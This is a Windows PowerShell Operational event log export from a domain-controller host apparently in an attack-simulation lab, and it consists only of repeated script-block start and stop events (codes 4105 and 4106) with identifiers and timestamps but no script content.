SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473636
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473635
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473634
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473633
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473632
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473631
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473630
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473629
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473628
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473627
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473626
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473625
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473624
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473623
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473622
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473621
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473620
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473619
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473618
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473617
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473616
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473615
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473614
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473613
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473612
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473611
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473610
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473609
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473608
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473607
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473606
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473605
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473604
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473603
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473602
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473601
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473600
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473599
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473598
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473597
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473596
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473595
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473594
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473593
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473592
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473591
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473590
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473589
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473588
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473587
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473586
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473585
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473584
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473583
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473582
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
